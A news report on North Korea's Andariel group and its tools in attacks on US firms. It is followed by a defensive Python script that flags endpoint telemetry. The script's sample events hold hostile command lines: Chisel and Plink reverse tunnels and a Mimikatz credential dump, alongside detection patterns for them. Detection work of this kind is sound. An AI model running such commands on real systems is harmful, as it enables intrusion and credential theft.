APT45 Ignores US Threats: Financial Gain Fuels Ongoing Cyberattacks
Symantec experts have discovered that the North Korean group Andariel (also known as Stonefly, APT45, Silent Chollima, Onyx Sleet) continues to target organizations in the United States for financial gain, despite the charges brought against them and the reward announced for their capture.
In August, Symantec detected intrusions into three U.S. companies, a month after the indictment was made public. Although the hackers were unable to deploy ransomware within the victims’ networks, their actions were financially motivated. All the targeted companies are private and engaged in commercial activities with no apparent intelligence value.
During the attacks, Stonefly utilized its proprietary malware Backdoor.Preft (also known as Dtrack or Valefor), which allows the downloading of files, command execution, and plugin installation. Indicators of compromise, recently documented by Microsoft, were also identified, including a forged Tableau certificate.
To maintain access to compromised systems, Stonefly employed other tools as well. One example is the Nukebot backdoor, which, in addition to Backdoor.Preft’s functionality, can also take screenshots. Although Nukebot had not previously been linked to Andariel, the malware’s source code leak enabled the group to use it. The attackers also ran scripts to store passwords in plain text and deployed Mimikatz, configuring the tool to collect credentials.
Two distinct keyloggers were identified during the attacks:
- The first stole clipboard data, logged program launches and keystrokes, and archived and encrypted the collected information.
- The second also had the capability to steal clipboard data, saving the information in a randomly named DAT file in the temporary directory.
Additionally, the attackers used tunneling tools (Chisel), SSH clients (PuTTY, Plink), cloud storage utilities (Megatools), and data visualization tools (Snap2HTML).
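As an added defensive example (not code from the Symantec report), the script below triages endpoint telemetry for the tool set and artifacts described above: the tunneling, SSH and cloud-transfer utilities, Mimikatz-style command lines, and a randomly named .dat file dropped in the temp directory. The JSON event format, rule names and sample events are constructed assumptions.

```python
import json
import re

# Constructed sample telemetry, one JSON event per line (not real data).
SAMPLE_EVENTS = r"""
{"id": 1, "type": "process", "image": "C:\\Users\\a\\chisel.exe", "cmdline": "chisel.exe client 203.0.113.10:8080 R:socks"}
{"id": 2, "type": "process", "image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k netsvcs"}
{"id": 3, "type": "process", "image": "C:\\Users\\a\\m.exe", "cmdline": "m.exe sekurlsa::logonpasswords"}
{"id": 4, "type": "file_create", "path": "C:\\Users\\a\\AppData\\Local\\Temp\\qZ7w3Lk9x.dat"}
{"id": 5, "type": "file_create", "path": "C:\\Users\\a\\AppData\\Local\\Temp\\setup.log"}
{"id": 6, "type": "process", "image": "C:\\Program Files\\PuTTY\\plink.exe", "cmdline": "plink.exe -N -R 8443:127.0.0.1:3389 user@198.51.100.7"}
"""

# Image basenames of the tools the report attributes to the intrusions.
TOOL_RE = re.compile(r"^(chisel|plink|putty|megatools|snap2html)(\.exe)?$", re.I)
# Mimikatz module prefixes commonly seen on the command line when dumping credentials.
MIMIKATZ_RE = re.compile(r"(sekurlsa|lsadump)::", re.I)
# Keylogger artifact: a random-looking alphanumeric .dat file created under a Temp directory.
TEMP_DAT_RE = re.compile(r"\\(Temp|tmp)\\[A-Za-z0-9]{6,16}\.dat$", re.I)


def basename(path: str) -> str:
    """Return the file name component of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def triage(jsonl: str) -> list[tuple[int, str]]:
    """Return (event id, rule name) pairs for events worth an analyst's review.

    Hits are leads, not verdicts: plink and PuTTY are legitimate admin tools,
    so each hit should be checked against expected activity for that host.
    """
    hits = []
    for line in jsonl.strip().splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev["type"] == "process":
            if TOOL_RE.match(basename(ev["image"])):
                hits.append((ev["id"], "tunnel_or_transfer_tool"))
            if MIMIKATZ_RE.search(ev.get("cmdline", "")):
                hits.append((ev["id"], "credential_dumping_cmdline"))
        elif ev["type"] == "file_create" and TEMP_DAT_RE.search(ev["path"]):
            hits.append((ev["id"], "random_dat_in_temp"))
    return hits


if __name__ == "__main__":
    for event_id, rule in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```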
On July 25, the U.S. Department of Justice indicted North Korean national Rim Chong Hyok, a suspected member of the Stonefly group, which is believed to be linked to North Korea’s Reconnaissance General Bureau (RGB). Rim Chong Hyok was charged with extorting American hospitals and other medical institutions between 2021 and 2023, laundering ransom payments, and financing subsequent cyberattacks on organizations in the defense, technology, and government sectors.